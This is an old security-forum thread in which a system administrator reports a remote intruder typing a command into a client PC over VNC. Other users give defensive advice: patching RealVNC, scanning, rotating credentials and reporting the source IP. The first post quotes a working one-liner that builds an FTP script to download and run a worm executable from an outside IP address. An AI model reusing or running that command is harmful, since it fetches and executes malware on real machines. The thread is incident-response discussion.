suspicious activity

[tgignac]

One of my client machines which is running avast from my ADNM had something weird happen to it today.
 
While I was working on it, the start menu and run command opened and the following command was entered into it:
 
"cmd.exe /c del i&echo open 24.220.147.205 16803 > i&echo user 1 1 >> i &echo get 886.exe >> i &echo quit >> i &ftp -n -s:i &886.exe&del i&exit"
 
So my suspision took me a bit further to go download this file named 886.exe using a development machine. It seems that this file contains what SOPHOS calls a W32/Rbot-ARZ virus.
 
Anyways, I tried e-mailing it to my account and it was blocked by our outside mail scanner messagelabs and they called it W32/Sdbot.worm.gen.ax
 
Fortunately this was not downloaded. However, I am curious as to what was running this command and how compromised this system actually is.
 
I immediately ran hijackthis to get a record of what was running and then attempted to clean the system with adaware, and spybot s&d. They both found nothing exciting...

This is the hijackthis log file...

Code: [Select]

Logfile of HijackThis v1.99.1
Scan saved at 4:07:21 PM, on 11/3/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\acs.exe
C:\Acer\eManager\anbmServ.exe
C:\Program Files\Alwil Software\Avast4\aswServ.exe
C:\Program Files\Alwil Software\Avast4\AvAgent.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\OpenVPN\bin\openvpnserv.exe
C:\Program Files\OpenVPN\bin\openvpn.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\Program Files\Alwil Software\Avast4\aswWebSv.exe
C:\Program Files\Atheros\ACU.exe
C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
C:\Program Files\Hewlett-Packard\OrderReminder\OrderReminder.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Documents and Settings\aflemming\Desktop\hijackthis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.easthants.ca/chambers/bin/login.cgi
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 192.168.11.4:3128
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O4 - HKLM\..\Run: [ACU] "C:\Program Files\Atheros\ACU.exe" -nogui
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\aswDisp.exe
O4 - HKLM\..\Run: [OrderReminder] C:\Program Files\Hewlett-Packard\OrderReminder\OrderReminder.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1131026867191
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1131027160060
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = easthants.ca
O17 - HKLM\Software\..\Telephony: DomainName = easthants.ca
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = easthants.ca
O23 - Service: Atheros Configuration Service (ACS) - Unknown owner - C:\WINDOWS\System32\acs.exe
O23 - Service: Notebook Manager Service (anbmService) - OSA Technologies Inc. - C:\Acer\eManager\anbmServ.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswMaiSv.exe" /service (file missing)
O23 - Service: avast! NetAgent - Unknown owner - C:\Program Files\Alwil Software\Avast4\AvAgent.exe" /ServiceStart (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswWebSv.exe" /service (file missing)
O23 - Service: OpenVPN Service (OpenVPNService) - Unknown owner - C:\Program Files\OpenVPN\bin\openvpnserv.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)


Any ideas?
How compromised is this system?

[mauserme]

What version of RealVNC do you have?  There is a security flaw in the way v4.1.1 authenticates clients that can allow your system to be compromised.

You might want to have a look at this thread

http://forum.avast.com/index.php?topic=23660.0


EDIT:  btw, Java is currently at 1.5.0_09, but that's probably not the cause of your current difficulty.

[tgignac]

I'm using the enterprise version of VNC.

[mauserme]

I'm not sure if this statement

"This issue is corrected in RealVNC version 4.1.2, RealVNC Personal Edition 4.2.3, and RealVNC Enterprise Edition 4.2.3. Refer to the RealVNC Downloads site to get a patched version."

means the enterprise edition was also vulnerable but it certainly implies so.  The full text is here http://www.kb.cert.org/vuls/id/117929

Other than RealVNC I'm not seeing anything I would question in your hijackthis log but others on the forum with more hijackthis experience may see something I haven't.  In any event I still think you should check you revision number.

[tgignac]

yeah... its enterprise version 4.2.6.8. I rolled it out as soon as the security alert was released.

I'm just wondering how the start -> run and then that command got posed in the gui like that... is it possible to script keystrokes and crap like that? If so, how do I find the script that was running the keystrokes to open the run command and put that ftp script in there?

Thats what really makes me nervous.

[mauserme]

Yes, but I'm still at a  loss as to what's going on.

Looking back at the hijackthis log I have a few questions and comments:

-- Did you post the entire log?

--  Are you using any software firewall?  I see none listed so either you have none, you're relying on the Windows Firewall or you have a third party firewall that's been disabled.

-- In the 023 section several of the avast! and one of the RealVNC files are shown as missing.

For now I would do this:

-- Repair you avast! installation through Add or Remove Programs or, if this doesn't work, install and reinstall.  Probably your ADMN too.

-- Reinstall RealVNC

-- Reinstall your firewall (or get one if you don't have any)

-- Run an avast! boot scan

-- Download and scan with A-Squared

http://www.emsisoft.com/en/software/free/

-- Download and scan with SuperAntispyware

http://www.superantispyware.com/

One more question.  When you noticed the commands you first posted being issued how were you able to read it?  I mean, did it flash by in an instant or was it more like it was being typed in real time?

[DavidR]

- In the 023 section several of the avast! and one of the RealVNC files are shown as missing.

This is a well known flaw in the current version of HJT.

Ignore any 023 reference to avast processes, this is a hiccup in the HJT 1.99.1 (especially missing file entry for avast), if you look at the supposed missing files, you wouldn't be able to scan your mail or web content and you would notice that and most of all if ashServ.exe was missing no scanning at all as that is the main scanning engine...

[mauserme]

Thanks David.

I'm wondering, though, since aswMaiSv.exe is also not listed in the Running Processes if this might be worth looking at.

[DavidR]

Nothing wrong with looking, but I doubt it is missing, I didn't check the running processes for those not listed.

Having looked at the log again Java is also out of date.
You need to update Sun Java as you are running is out of date. Get the latest version, once you have done this, uninstall all older versions from Control Panel > Add/Remove Programs.

http://www.java.com/en/download/index.jsp

[Lisandro]

I'm wondering, though, since aswMaiSv.exe is also not listed in the Running Processes if this might be worth looking at.

It is manually started when you check mail (it's a Windows Service).
But it is not killed after that, just remains in background, active, but not consuming resources.
Did you download emails at least once before looking at Task Manager?
Also it runs as AUTORITY NT\SYSTEM account level. Are you seeing processes from ALL users or just yours?

[mauserme]

It is manually started when you check mail (it's a Windows Service).

OK - that makes sense 

[tgignac]

Its funny when the command was being typed in.... And I caught it by accident.. I was vnc'd in checking an e-mail issue my user was having... He was home and connected by secure VPN. They only have windows firewall enabled as they are all behind hardware firewalls.

Anyways, while I was remoted in, I saw the start menu pop up, and then the run command loaded. There was no mouse activity so it must have been controlled by key commands.... anyways, I saw the command I posed above start to be entered into the run line. I was running an instance of notepad at the same time and clicked the notepad app to bring it to the foreground and the command continued to be typed out in my notepad document.

I then copied the first few commands in the run line and pasted it into the notepad to ensure I had the full command.

It is above...

I did update Java after noticing that, thanks.

[mauserme]

Its funny when the command was being typed in.... And I caught it by accident.. I was vnc'd in checking an e-mail issue my user was having...

Well, it seems like you weren't alone.

While it's possible there's a backdoor or remote tool on your computer I don't see this is the most likely problem.  Still, you should run the scans I mentioned above to check this.

More likely, maybe, are one of the following (some of these assume you're in a business environment):

-- User ID and password(s) were stolen by an attacker before you patched RealVNC or through other means such as a user leaving a list of passwords in plain view on a desk

-- Access was gained through an active session that was left unattended, say while an employee working from home took a break from the computer (I don't mean to speak badly of people but the reality is the attack came from somewhere)

-- An ex-employee's credentials have not been revoked

-- An active employee who feels he has an axe to grind is trying to wreak a little havoc

-- There could be an insecure wireless device in the network, possibly in an employee's home.

-- A new, unidentified, RealVNC vulnerability exists (not too likely; just looking at the possibilities)

Because you had the unique experience of watching the attack in progress you do have a tool normally not available.  The IP address you noted above is, potentially, that of the attacker.  It resolves to a cable provider in the Dakotas of the United States named Midcontinent Communications.  Here's a link to the home page

http://www.midcocomm.com/

In addition to contacting them to report the incident you should require all valid users to change their IDs and passwords, and review all credentials to make sure there are none still valid for people who might have left the company.

Regarding the firewall, the one native to Windows and your appliance provide inbound protection but not outbound.  There are many free ones available for home use but you might violate the terms of the license with these in your environment.  In your situation, however, I would probably test one or two of the free ones for compatability with an intent to purchase.  This might help get things under control and I'm sure for short term evaluation purposes the vendor would understand.

You also need to search you computer for the presence of a file name i.  Do the search with i enclosed in quotes ("i") - otherwise you will get a list of every file containing i in the name.  The reason for this search is the method the attacker was using.  If I'm reading the commands correctly the attacker was writing a text file named i to contain batched ftp commands.  An ftp session would then have been opened and 886.exe would be transferred.  After running 886.exe, i would have been deleted and the command window would have closed.  Since you interupted this process there is a possibility that i exists on your hard drive with some or all of the ftp commands.  In this situation I would archive i to a cd in case you need documentation of the attack and delete it form the hard drive.

Please post the results of the scans when you get a chance.

EDIT:  If you do find a file named i you can safely read its contents before deleting it in a command window with the command "type i" leaving off the quotes.